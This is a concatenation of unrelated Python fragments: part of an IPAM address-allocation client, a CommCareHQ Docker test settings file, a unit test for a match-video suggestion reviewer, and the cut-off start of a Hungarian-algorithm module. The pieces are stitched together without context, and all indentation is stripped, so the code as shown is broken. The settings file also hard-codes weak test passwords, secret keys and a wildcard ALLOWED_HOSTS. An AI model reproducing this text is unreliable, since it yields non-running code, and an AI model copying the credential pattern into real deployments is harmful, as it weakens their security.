:param handle_id: allocation handle ID for this request. You can query
this key using get_assignments_by_handle() or release all addresses
with this key using release_by_handle().
:param attributes: Contents of this dict will be stored with the
assignment and can be queried using get_assignment_attributes(). Must
be JSON serializable.
:param pool: (optional) Tuple of (v4 pool, v6 pool); if supplied, the
pool(s) to assign from, If None, automatically choose a pool.
:param host: (optional) The host ID to use for affinity in assigning IP
addresses. Defaults to the hostname returned by get_hostname().
:return: A tuple of (v4_address_list, v6_address_list). When IPs in
configured pools are at or near exhaustion, this method may return
fewer than requested addresses.
"""
assert isinstance(handle_id, str) or handle_id is None
host = host or get_hostname()
_log.info("Auto-assign %d IPv4, %d IPv6 addrs",
num_v4, num_v6)
v4_address_list = self._auto_assign(4, num_v4, handle_id, attributes,
pool[0], host)
_log.info("Auto-assigned IPv4s %s",
[str(addr) for addr in v4_address_list])
v6_address_list = self._auto_assign(6, num_v6, handle_id, attributes,
pool[1], host)
_log.info("Auto-assigned IPv6s %s",
[str(addr) for addr in v6_address_list])
return v4_address_list, v6_address_list
def _auto_assign(self, ip_version, num, handle_id,
attributes, pool, host):
"""
Auto assign addresses from a specific IP version.
Hosts automatically register themselves as the owner of a block the
first time they request an auto-assigned IP. For auto-assignment, a
host will allocate from a block it owns, or if all their currently
owned blocks get full, it will register itself as the owner of a new
block. If all blocks are owned, and all the host's own blocks are
full, it will pick blocks at random until it can fulfil the request.
If you're really, really out of addresses, it will fail the request.
:param ip_version: 4 or 6, the IP version number.
:param num: Number of addresses to assign.
:param handle_id: allocation handle ID for this request.
:param attributes: Contents of this dict will be stored with the
assignment and can be queried using get_assignment_attributes(). Must
be JSON serializable.
:param pool: (optional) if supplied, the pool to assign from, If None,
automatically choose a pool.
:param host: The host ID to use for affinity in assigning IP addresses.
:return:
"""
assert isinstance(handle_id, str) or handle_id is None
# Start by trying to assign from one of the host-affine blocks. We
# always do strict checking at this stage, so it doesn't matter whether
# globally we have strict_affinity or not.
block_list = self._get_affine_blocks(host,
ip_version,
pool)
block_ids = list(block_list)
key_errors = 0
allocated_ips = []
num_remaining = num
while num_remaining > 0:
try:
block_id = block_ids.pop(0)
except IndexError:
_log.info("Ran out of affine blocks for %s in pool %s",
host, pool)
break
try:
ips = self._auto_assign_ips_in_block(block_id,
num_remaining,
handle_id,
attributes,
host)
except KeyError:
# In certain rare race conditions, _get_affine_blocks above
# can return block_ids that don't exist (due to multiple IPAM
# clients on this host running simultaneously). If that
# happens, requeue the block_id for a retry, since we expect
# the other IPAM client to shortly create the block. To stop
# endless looping we limit the number of KeyErrors that will
# generate a retry.
_log.warning("Tried to auto-assign to block %s. Doesn't "
"exist.", block_id)
key_errors += 1
if key_errors <= KEY_ERROR_RETRIES:
_log.debug("Queueing block %s for retry.", block_id)
block_ids.append(block_id)
else:
_log.warning("Stopping retry of block %s.", block_id)
continue
except NoHostAffinityError:
# In certain rare race conditions, _get_affine_blocks above
# can return block_ids that don't actually have affinity to
# this host (due to multiple IPAM clients on this host running
# simultaneously). If that happens, just move to the next one.
_log.warning("No host affinity on block %s; skipping.",
block_id)
continue
allocated_ips.extend(ips)
num_remaining = num - len(allocated_ips)
# If there are still addresses to allocate, then we've run out of
# blocks with affinity. Before we can assign new blocks or assign in
# non-affine blocks, we need to check that our IPAM configuration
# allows that.
ipam_config = self.get_ipam_config()
# If we can auto allocate blocks, try to fulfill address request by
# allocating new blocks.
if ipam_config.auto_allocate_blocks:
_log.debug("Attempt to allocate new affine blocks")
retries = RETRIES
while num_remaining > 0 and retries > 0:
retries -= 1
try:
new_block = self._new_affine_block(host,
ip_version,
pool,
ipam_config)
# If successful, this creates the block and registers it to
# us.
except NoFreeBlocksError:
_log.info("Could not get new host affinity block for %s in "
"pool %s", host, pool)
break
ips = self._auto_assign_ips_in_block(new_block,
num_remaining,
handle_id,
attributes,
host)
allocated_ips.extend(ips)
num_remaining = num - len(allocated_ips)
if retries == 0: # pragma: no cover
raise RuntimeError("Hit Max Retries.")
# If there are still addresses to allocate, we've now tried all blocks
# with some affinity to us, and tried (and failed) to allocate new
# ones. If we do not require strict host affinity, our last option is
# a random hunt through any blocks we haven't yet tried.
#
# Note that this processing simply takes all of the IP pools and breaks
# them up into block-sized CIDRs, then shuffles and searches through each
# CIDR. This algorithm does not work if we disallow auto-allocation of
# blocks because the allocated blocks may be sparsely populated in the
# pools resulting in a very slow search for free addresses.
#
# If we need to support non-strict affinity and no auto-allocation of
# blocks, then we should query the actual allocation blocks and assign
# from those.
if not ipam_config.strict_affinity:
_log.debug("Attempt to allocate from non-affine random block")
if num_remaining > 0:
random_blocks = iter(self._random_blocks(block_list,
ip_version,
pool))
while num_remaining > 0:
try:
block_id = random_blocks.next()
except StopIteration:
_log.warning("All addresses exhausted in pool %s", pool)
break
ips = self._auto_assign_ips_in_block(block_id,
num_remaining,
handle_id,
attributes,
host,
affinity_check=False)
allocated_ips.extend(ips)
num_remaining = num - len(allocated_ips)
return allocated_ips
def _auto_assign_ips_in_block(self, block_cidr, num, handle_id, attributes,
host, affinity_check=True):
"""
Automatically pick IPs from a block and commit them to the data store.
:param block_cidr: The identifier for the block to read.
:param num: The number of IPs to assign.
:param handle_id: allocation handle ID for this request.
:param attributes: Contents of this dict will be stored with the
assignment and can be queried using get_assignment_attributes(). Must
be JSON serializable.
:param host: The host ID to use for affinity in assigning IP addresses.
:param affinity_check: True to enable checking the host has the
affinity to the block, False to disable this check, for example, while
randomly searching after failure to get affine block.
:return: List of assigned IPs.
"""
assert isinstance(handle_id, str) or handle_id is None
_log.debug("Auto-assigning from block %s", block_cidr)
for i in xrange(RETRIES):
_log.debug("Auto-assign from %s, retry %d", block_cidr, i)
block = self._read_block(block_cidr)
unconfirmed_ips = block.auto_assign(num=num,
handle_id=handle_id,
attributes=attributes,
host=host,
affinity_check=affinity_check)
if len(unconfirmed_ips) == 0:
_log.debug("Block %s is full.", block_cidr)
return []
# If using a handle, increment the handle by the number of
# confirmed IPs.
if handle_id is not None:
self._increment_handle(handle_id,
block_cidr,
len(unconfirmed_ips))
try:
self._compare_and_swap_block(block)
except CASError:
_log.debug("CAS failed on block %s", block_cidr)
if handle_id is not None:
self._decrement_handle(handle_id,
block_cidr,
len(unconfirmed_ips))
else:
return unconfirmed_ips
raise RuntimeError("Hit Max Retries.")
@handle_errors
def assign_ip(self, address, handle_id, attributes, host=None):
"""
Assign the given address. Throws AlreadyAssignedError if the address
is taken. If the strict_affinity option is set to True, this
throws a NoHostAffinityError if the address is in a block owned by a
different host.
:param address: IPAddress to assign.
:param handle_id: allocation handle ID for this request. You can
query this key using get_assignments_by_handle() or release all
addresses with this handle_id using release_by_handle().
:param attributes: Contents of this dict will be stored with the
assignment and can be queried using get_assignment_attributes(). Must
be JSON serializable.
:param host: (optional) The host ID to use for affinity in assigning IP
addresses. Defaults to the hostname returned by get_hostname().
:return: None.
"""
assert isinstance(handle_id, str) or handle_id is None
assert isinstance(address, IPAddress)
host = host or get_hostname()
block_cidr = get_block_cidr_for_address(address)
ipam_config = None
for _ in xrange(RETRIES):
try:
block = self._read_block(block_cidr)
except KeyError:
_log.debug("Block %s doesn't exist.", block_cidr)
if self._validate_cidr_in_pools(block_cidr):
_log.debug("Create and claim block %s.",
block_cidr)
# We need the IPAM config, so get it once now.
if ipam_config is None:
_log.debug("Querying IPAM config")
ipam_config = self.get_ipam_config()
try:
self._claim_block_affinity(host, block_cidr,
ipam_config)
except HostAffinityClaimedError:
_log.debug("Someone else claimed block %s before us.",
block_cidr)
continue
# Block exists now, retry writing to it.
_log.debug("Claimed block %s", block_cidr)
continue
else:
raise PoolNotFound("%s is not in any configured pool" %
address)
# Try to assign. Throws AlreadyAssignedError if already assigned,
# or a NoHostAffinityError if the block requires strict host
# affinity and the host affinity does not match the host.
block.assign(address, handle_id, attributes, host)
# If using a handle, increment by one IP
if handle_id is not None:
self._increment_handle(handle_id, block_cidr, 1)
# Try to commit.
try:
self._compare_and_swap_block(block)
return # Success!
except CASError:
_log.debug("CAS failed on block %s", block_cidr)
if handle_id is not None:
self._decrement_handle(handle_id,
block_cidr,
1)
raise RuntimeError("Hit max retries.")
@handle_errors
def release_ips(self, addresses):
"""
Release the given addresses.
:param addresses: Set of IPAddresses to release (ok to mix IPv4 and
IPv6).
:return: Set of addresses that were already unallocated.
"""
assert isinstance(addresses, (set, frozenset))
_log.info("Releasing addresses %s", [str(addr) for addr in addresses])
unallocated = set()
# sort the addresses into blocks
addrs_by_block = {}
for address in addresses:
block_cidr = get_block_cidr_for_address(address)
addrs = addrs_by_block.setdefault(block_cidr, set())
addrs.add(address)
# loop through blocks, CAS releasing.
for block_cidr, addresses in addrs_by_block.iteritems():
unalloc_block = self._release_ips_from_block(block_cidr, addresses)
unallocated = unallocated.union(unalloc_block)
return unallocated
def _release_ips_from_block(self, block_cidr, addresses):
"""
Release the given addresses from the block, using compare-and-swap to
write the block.
:param block_cidr: IPNetwork identifying the block
:param addresses: List of addresses to release.
:return: List of addresses that were already unallocated.
"""
_log.debug("Releasing %d adddresses from block %s",
len(addresses), block_cidr)
for _ in xrange(RETRIES):
try:
block = self._read_block(block_cidr)
except KeyError:
_log.debug("Block %s doesn't exist.", block_cidr)
# OK to return, all addresses must be released already.
return addresses
(unallocated, handles) = block.release(addresses)
assert len(unallocated) <= len(addresses)
if len(unallocated) == len(addresses):
# All the addresses are already unallocated.
return addresses
# Try to commit
try:
# If the block is now empty and there is no host affinity to
# the block then delete the block, otherwise just update the
# block configuration.
if block.is_empty() and not block.host_affinity:
_log.debug("Deleting empty non-affine block")
self._delete_block(block)
else:
_log.debug("Updating assignments in block")
self._compare_and_swap_block(block)
except CASError:
continue
else:
# Success! Decrement handles.
for handle_id, amount in handles.iteritems():
if handle_id is not None:
# Skip the None handle, it's a special value meaning
# the addresses were not allocated with a handle.
self._decrement_handle(handle_id, block_cidr, amount)
return unallocated
raise RuntimeError("Hit Max retries.") # pragma: no cover
def _validate_cidr_in_pools(self, cidr):
"""
Validate a CIDR is fully covered by one of the configured IP pools.
Raises a PoolNotFound exception if the CIDR is not valid.
:param cidr: (IPNetwork) The CIDR to check.
"""
pools = self.get_ip_pools(cidr.version, ipam=True, include_disabled=False)
return any([cidr in pool for pool in pools])
@handle_errors
def get_ip_assignments_by_handle(self, handle_id):
"""
Return a list of IPAddresses assigned to the key.
:param handle_id: Key to query e.g. used on assign_ip() or
auto_assign_ips().
:return: List of IPAddresses
"""
assert isinstance(handle_id, str)
handle = self._read_handle(handle_id) # Can throw KeyError, let it.
ip_assignments = []
for block_str in handle.block:
block_cidr = IPNetwork(block_str)
try:
block = self._read_block(block_cidr)
except KeyError:
_log.warning("Couldn't read block %s referenced in handle %s.",
block_str, handle_id)
continue
ips = block.get_ip_assignments_by_handle(handle_id)
ip_assignments.extend(ips)
return ip_assignments
@handle_errors
def release_ip_by_handle(self, handle_id):
"""
Release all addresses assigned to the key.
:param handle_id: Key to query, e.g. used on assign_ip() or
auto_assign_ips().
:return: None.
"""
assert isinstance(handle_id, str)
handle = self._read_handle(handle_id) # Can throw KeyError, let it.
# Loop through blocks, releasing.
for block_str in handle.block:
block_cidr = IPNetwork(block_str)
self._release_ip_by_handle_block(handle_id, block_cidr)
def _release_ip_by_handle_block(self, handle_id, block_cidr):
"""
Release all address in a block with the given handle ID.
:param handle_id: The handle ID to find addresses with.
:param block_cidr: The block to release addresses on.
:return: None
"""
for _ in xrange(RETRIES):
try:
block = self._read_block(block_cidr)
except KeyError:
# Block doesn't exist, so all addresses are already
# unallocated. This can happen if the handle is overestimating
# the number of assigned addresses, which is a transient, but
# expected condition.
return
num_release = block.release_by_handle(handle_id)
if num_release == 0:
# Block didn't have any addresses with this handle, so all
# so all addresses are already unallocated. This can happen if
# the handle is overestimating the number of assigned
# addresses, which is a transient, but expected condition.
return
try:
self._compare_and_swap_block(block)
except CASError:
# Failed to update, retry.
continue
# Successfully updated block, update the handle if necessary.
if handle_id is not None:
# Skip the None handle, it's a special value meaning
# the addresses were not allocated with a handle.
self._decrement_handle(handle_id, block_cidr, num_release)
return
raise RuntimeError("Hit Max retries.") # pragma: no cover
@handle_errors
def get_assignment_attributes(self, address):
"""
Return the attributes of a given address.
:param address: IPAddress to query.
:return: The attributes for the address as passed to auto_assign() or
assign().
"""
assert isinstance(address, IPAddress)
block_cidr = get_block_cidr_for_address(address)
try:
block = self._read_block(block_cidr)
except KeyError:
_log.warning("Couldn't read block %s for requested address %s",
block_cidr, address)
raise AddressNotAssignedError("%s is not assigned." % address)
else:
_, attributes = block.get_attributes_for_ip(address)
return attributes
@handle_errors
def claim_affinity(self, cidr, host=None):
"""
Claim affinity for the blocks covered by the requested CIDR.
:param cidr: The CIDR covering the blocks to be released. Raises a
InvalidBlockSizeError if the CIDR is smaller than the minimum allowable
block size.
:param host: (optional) The host ID to use for affinity in assigning IP
addresses. Defaults to the hostname returned by get_hostname().
:return: A tuple of:
([IPNetwork<blocks claimed>],
[IPNetwork<blocks that were claimed by another host>])
"""
assert isinstance(cidr, IPNetwork)
if not validate_block_size(cidr):
_log.info("Requested CIDR %s is too small", cidr)
raise InvalidBlockSizeError("The requested CIDR is smaller than "
"the minimum block size.")
host = host or get_hostname()
if not self._validate_cidr_in_pools(cidr):
_log.info("Requested CIDR %s is not in a configured pool", cidr)
raise PoolNotFound("Requested CIDR is not in a configured IP "
"Pool.")
claimed = []
unclaimed = []
# Get the IPAM configuration. We need this when claiming block
# affinities.
ipam_config = self.get_ipam_config()
for block_cidr in cidr.subnet(BLOCK_PREFIXLEN[cidr.version]):
try:
self._claim_block_affinity(host, block_cidr, ipam_config)
except HostAffinityClaimedError:
unclaimed.append(block_cidr)
break
else:
claimed.append(block_cidr)
return claimed, unclaimed
@handle_errors
def release_affinity(self, cidr, host=None):
"""
:param cidr: The CIDR covering the blocks to be released. Raises a
InvalidBlockSizeError if the CIDR is smaller than the minimum allowable
block size.
:param host: (optional) The host ID to compare against the affinity of
each block that is being released.
:return: A tuple of:
([IPNetwork<blocks released>],
[IPNetwork<blocks that were not claimed>],
[IPNetwork<blocks that were claimed by another host>])
"""
assert isinstance(cidr, IPNetwork)
if not validate_block_size(cidr):
_log.info("Requested CIDR %s is too small", cidr)
raise InvalidBlockSizeError("The requested CIDR is smaller than "
"the minimum block size.")
host = host or get_hostname()
released = []
not_claimed = []
claimed_by_other = []
for block_cidr in cidr.subnet(BLOCK_PREFIXLEN[cidr.version]):
try:
self._release_block_affinity(host, block_cidr)
except HostAffinityClaimedError:
claimed_by_other.append(block_cidr)
except KeyError:
not_claimed.append(block_cidr)
else:
released.append(block_cidr)
return released, not_claimed, claimed_by_other
@handle_errors
def release_host_affinities(self, host):
"""
Release affinities for all blocks owned by the host.
:param host: (optional) The host ID to compare against the affinity of
each block that is being released.
"""
host = host or get_hostname()
# Find all of the affine blocks that are listed for the host, and
# release affinity for each. Note that the host may over-estimate
# which blocks it has affinity for so ignore any error indicating that
# the block is owned by another host - we simply won't release that
# block.
_log.debug("Releasing affinities for %s", host)
for version in (4, 6):
cidrs = self._get_affine_blocks(host, version, None)
for cidr in cidrs:
try:
self._release_block_affinity(host, cidr)
except HostAffinityClaimedError:
_log.info("Affine block %s is not owned by host %s - skip",
cidr, host)
@handle_errors
def release_pool_affinities(self, pool):
"""
Release affinities for all blocks in the specified pool.
:param pool: The IP Pool.
This may throw KeyError and HostAffinityClaimedError if another
IPAM user is making conflicting changes.
"""
for _ in range(KEY_ERROR_RETRIES):
retry = False
for host, block_cidr in self._get_host_block_pairs(pool):
try:
self._release_block_affinity(host, block_cidr)
except (KeyError, HostAffinityClaimedError):
# Hit a conflict - carry on with remaining CIDRs, but retry
# once we have finished with the current CIDR list.
retry = True
if not retry:
return
# Too may retries - re-raise the last exception.
raise
@handle_errors
def remove_ipam_host(self, host):
"""
Remove an IPAM host. This removes all host affinities from the
existing allocation blocks, and removes the host specific IPAM data.
This method does not release individual IP address assigned by the
host - the IP addresses need to be released separately.
:param host: (optional) The host ID.
:return: nothing.
"""
# Get the host if not specified.
host = host or get_hostname()
# Release host affinities before removing the host tree,
self.release_host_affinities(host)
# Remove the host ipam tree.
host_path = IPAM_HOST_PATH % {"host": host}
try:
self.etcd_client.delete(host_path, dir=True, recursive=True)
except EtcdKeyNotFound:
pass
| |
####### Configuration for CommCareHQ Running in docker #######
import os
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'commcarehq',
'USER': 'commcarehq',
'PASSWORD': 'commcarehq',
'HOST': 'postgres',
'PORT': '5432',
'TEST': {
'SERIALIZE': False,
},
},
}
USE_PARTITIONED_DATABASE = os.environ.get('USE_PARTITIONED_DATABASE', 'no') == 'yes'
if USE_PARTITIONED_DATABASE:
DATABASES.update({
'proxy': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'commcarehq_proxy',
'USER': 'commcarehq',
'PASSWORD': 'commcarehq',
'HOST': 'postgres',
'PORT': '5432',
'TEST': {
'SERIALIZE': False,
},
},
'p1': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'commcarehq_p1',
'USER': 'commcarehq',
'PASSWORD': 'commcarehq',
'HOST': 'postgres',
'PORT': '5432',
'TEST': {
'SERIALIZE': False,
},
},
'p2': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'commcarehq_p2',
'USER': 'commcarehq',
'PASSWORD': 'commcarehq',
'HOST': 'postgres',
'PORT': '5432',
'TEST': {
'SERIALIZE': False,
},
},
})
PARTITION_DATABASE_CONFIG = {
'shards': {
'p1': [0, 1],
'p2': [2, 3]
},
'groups': {
'main': ['default'],
'proxy': ['proxy'],
'form_processing': ['p1', 'p2'],
},
'host_map': {
'postgres': 'localhost'
}
}
####### Couch Config ######
COUCH_HTTPS = False
COUCH_SERVER_ROOT = 'couch:5984'
COUCH_USERNAME = ''
COUCH_PASSWORD = ''
COUCH_DATABASE_NAME = 'commcarehq'
redis_host = 'redis'
redis_cache = {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': 'redis://{}:6379/0'.format(redis_host),
'OPTIONS': {},
}
CACHES = {
'default': redis_cache,
'redis': redis_cache
}
WS4REDIS_CONNECTION = {
'host': redis_host,
}
ELASTICSEARCH_HOST = 'elasticsearch'
ELASTICSEARCH_PORT = 9200
S3_BLOB_DB_SETTINGS = {
"url": "http://riakcs:9980/",
"access_key": "admin-key",
"secret_key": "admin-secret",
"config": {"connect_timeout": 3, "read_timeout": 5},
}
KAFKA_URL = 'kafka:9092'
SHARED_DRIVE_ROOT = '/sharedfiles'
ALLOWED_HOSTS = ['*']
#FIX_LOGGER_ERROR_OBFUSCATION = True
# faster compressor that doesn't do source maps
COMPRESS_JS_COMPRESSOR = 'compressor.js.JsCompressor'
CELERY_ALWAYS_EAGER = True
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
INACTIVITY_TIMEOUT = 60 * 24 * 365
CSRF_SOFT_MODE = False
SHARED_DRIVE_ROOT = '/sharedfiles'
BASE_ADDRESS = '{}:8000'.format(os.environ.get('HQ_PORT_8000_TCP_ADDR', 'localhost'))
######## Email setup ########
# email settings: these ones are the custom hq ones
EMAIL_LOGIN = "notifications@dimagi.com"
EMAIL_PASSWORD = "******"
EMAIL_SMTP_HOST = "smtp.gmail.com"
EMAIL_SMTP_PORT = 587
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
####### Bitly ########
BITLY_LOGIN = None
####### Jar signing config ########
_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
JAR_SIGN = {
"jad_tool": os.path.join(_ROOT_DIR, "corehq", "apps", "app_manager", "JadTool.jar"),
"key_store": os.path.join(_ROOT_DIR, "InsecureTestingKeyStore"),
"key_alias": "javarosakey",
"store_pass": "onetwothreefourfive",
"key_pass": "onetwothreefourfive",
}
AUDIT_MODEL_SAVE = ['django.contrib.auth.models.User']
AUDIT_ADMIN_VIEWS = False
SECRET_KEY = 'secrettravis'
# No logging
LOCAL_LOGGING_HANDLERS = {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler',
},
}
LOCAL_LOGGING_LOGGERS = {
'': {
'level': 'CRITICAL',
'handler': 'null',
'propagate': True,
},
'pillowtop': {
'level': 'CRITICAL',
'handler': 'null',
'propagate': True,
},
'notify': {
'level': 'CRITICAL',
'handler': 'null',
'propagate': True,
},
}
PHONE_TIMEZONES_HAVE_BEEN_PROCESSED = True
PHONE_TIMEZONES_SHOULD_BE_PROCESSED = True
ENABLE_PRELOGIN_SITE = True
TESTS_SHOULD_TRACK_CLEANLINESS = True
# touchforms must be running when this is false or not set
# see also corehq.apps.sms.tests.util.TouchformsTestCase
SKIP_TOUCHFORMS_TESTS = True
UNIT_TESTING = True
PILLOWTOP_MACHINE_ID = 'testhq'
ELASTICSEARCH_VERSION = 1.7
CACHE_REPORTS = True
if os.environ.get("COMMCAREHQ_BOOTSTRAP") == "yes":
UNIT_TESTING = False
ADMINS = (('Admin', 'admin@example.com'),)
CELERY_SEND_TASK_ERROR_EMAILS = True
LESS_DEBUG = True
LESS_WATCH = False
COMPRESS_OFFLINE = False
XFORMS_PLAYER_URL = 'http://127.0.0.1:4444'
TOUCHFORMS_API_USER = 'admin@example.com'
TOUCHFORMS_API_PASSWORD = 'password'
CCHQ_API_THROTTLE_REQUESTS = 200
CCHQ_API_THROTTLE_TIMEFRAME = 10
RESTORE_PAYLOAD_DIR_NAME = 'restore'
SHARED_TEMP_DIR_NAME = 'temp'
| |
import unittest2
import webapp2
import webtest
from datetime import datetime
from google.appengine.datastore import datastore_stub_util
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from webapp2_extras.routes import RedirectRoute
from consts.account_permissions import AccountPermissions
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.suggestions.suggest_match_video_review_controller import \
SuggestMatchVideoReviewController
from helpers.suggestions.suggestion_creator import SuggestionCreator
from models.account import Account
from models.event import Event
from models.match import Match
from models.suggestion import Suggestion
class TestSuggestMatchVideoReviewController(unittest2.TestCase):
def setUp(self):
self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=1)
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
self.testbed.init_memcache_stub()
self.testbed.init_user_stub()
self.testbed.init_urlfetch_stub()
self.testbed.init_taskqueue_stub(_all_queues_valid=True)
ndb.get_context().clear_cache() # Prevent data from leaking between tests
app = webapp2.WSGIApplication([
RedirectRoute(r'/suggest/match/video/review', SuggestMatchVideoReviewController, 'suggest-video', strict_slash=True),
], debug=True)
self.testapp = webtest.TestApp(app)
self.event = Event(
id="2016necmp",
name="New England District Championship",
event_type_enum=EventType.DISTRICT_CMP,
event_district_enum=DistrictType.NEW_ENGLAND,
short_name="New England",
event_short="necmp",
year=2016,
end_date=datetime(2016, 03, 27),
official=False,
city='Hartford',
state_prov='CT',
country='USA',
venue="Some Venue",
venue_address="Some Venue, Hartford, CT, USA",
timezone_id="America/New_York",
start_date=datetime(2016, 03, 24),
webcast_json="",
website="http://www.firstsv.org"
)
self.event.put()
self.match = Match(
id="2016necmp_f1m1",
event=ndb.Key(Event, "2016necmp"),
year=2016,
comp_level="f",
set_number=1,
match_number=1,
team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
time=datetime.fromtimestamp(1409527874),
time_string="4:31 PM",
tba_videos=[],
alliances_json='{\
"blue": {\
"score": 270,\
"teams": [\
"frc846",\
"frc2135",\
"frc971"]},\
"red": {\
"score": 310,\
"teams": [\
"frc254",\
"frc1678",\
"frc973"]}}',
score_breakdown_json='{\
"blue": {\
"auto": 70,\
"teleop_goal+foul": 40,\
"assist": 120,\
"truss+catch": 40\
},"red": {\
"auto": 70,\
"teleop_goal+foul": 50,\
"assist": 150,\
"truss+catch": 40}}'
)
self.match.put()
self.match2 = Match(
id="2016necmp_f1m2",
event=ndb.Key(Event, "2016necmp"),
year=2016,
comp_level="f",
set_number=1,
match_number=2,
team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
time=datetime.fromtimestamp(1409527874),
time_string="4:31 PM",
tba_videos=[],
alliances_json='{\
"blue": {\
"score": 270,\
"teams": [\
"frc846",\
"frc2135",\
"frc971"]},\
"red": {\
"score": 310,\
"teams": [\
"frc254",\
"frc1678",\
"frc973"]}}',
score_breakdown_json='{\
"blue": {\
"auto": 70,\
"teleop_goal+foul": 40,\
"assist": 120,\
"truss+catch": 40\
},"red": {\
"auto": 70,\
"teleop_goal+foul": 50,\
"assist": 150,\
"truss+catch": 40}}'
)
self.match2.put()
def tearDown(self):
self.testbed.deactivate()
def loginUser(self):
self.testbed.setup_env(
user_email="user@example.com",
user_id="123",
user_is_admin='0',
overwrite=True
)
self.account = Account.get_or_insert(
"123",
email="user@example.com",
registered=True
)
def givePermission(self):
self.account.permissions.append(AccountPermissions.REVIEW_MEDIA)
self.account.put()
def createSuggestion(self):
status = SuggestionCreator.createMatchVideoYouTubeSuggestion(self.account.key,
"H-54KMwMKY0",
"2016necmp_f1m1")
self.assertEqual(status, 'success')
return Suggestion.render_media_key_name(2016, 'match', '2016necmp_f1m1', 'youtube', 'H-54KMwMKY0')
def getSuggestionForm(self):
response = self.testapp.get('/suggest/match/video/review')
self.assertEqual(response.status_int, 200)
form = response.forms.get('review_videos', None)
self.assertIsNotNone(form)
return form
def test_login_redirect(self):
response = self.testapp.get('/suggest/match/video/review', status='3*')
response = response.follow(expect_errors=True)
self.assertTrue(response.request.path.startswith("/account/login_required"))
def test_no_permissions(self):
self.loginUser()
response = self.testapp.get('/suggest/match/video/review', status='3*')
response = response.follow(expect_errors=True)
self.assertEqual(response.request.path, '/')
def test_nothing_to_review(self):
self.loginUser()
self.givePermission()
response = self.testapp.get('/suggest/match/video/review')
self.assertEqual(response.status_int, 200)
def test_accept_suggestion(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
def test_accept_new_key(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
form['key-{}'.format(suggestion_id)] = '2016necmp_f1m2'
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match2.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
# Make sure we don't add it to the first match
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
def test_accept_bad_key(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form['accept_reject-{}'.format(suggestion_id)] = 'accept::{}'.format(suggestion_id)
form['key-{}'.format(suggestion_id)] = '2016necmp_f1m3' # This match doesn't exist
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we don't mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_PENDING)
# Make sure the video doesn't get associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertIsNotNone(match.youtube_videos)
self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
def test_reject_suggestion(self):
self.loginUser()
self.givePermission()
suggestion_id = self.createSuggestion()
form = self.getSuggestionForm()
form['accept_reject-{}'.format(suggestion_id)] = 'reject::{}'.format(suggestion_id)
response = form.submit().follow()
self.assertEqual(response.status_int, 200)
# Make sure we mark the Suggestion as REVIEWED
suggestion = Suggestion.get_by_id(suggestion_id)
self.assertIsNotNone(suggestion)
self.assertEqual(suggestion.review_state, Suggestion.REVIEW_REJECTED)
# Make sure the video gets associated
match = Match.get_by_id(self.match.key_name)
self.assertIsNotNone(match)
self.assertFalse(match.youtube_videos)
| |
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by Brian Clapper,
# adapted to NumPy by Gael Varoquaux.
# Further improvements by Ben Root, Vlad Niculae and Lars Buitinck.
#
# Copyright (c) 2008 Brian M. Clapper <bmc@clapper.org>, Gael Varoquaux
# Author: Brian M. Clapper, Gael Varoquaux
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix):
"""Solve the linear sum assignment problem.
The linear sum assignment problem is also known as minimum weight matching
in bipartite graphs. A problem instance is described by a matrix C, where
each C[i,j] is the cost of matching vertex i of the first partite set
(a "worker") and vertex j of the second set (a "job"). The goal is to find
a complete assignment of workers to jobs of minimal cost.
Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
assigned to column j. Then the optimal assignment has cost
.. math::
\min \sum_i \sum_j C_{i,j} X_{i,j}
s.t. each row is assignment to at most one column, and each column to at
most one row.
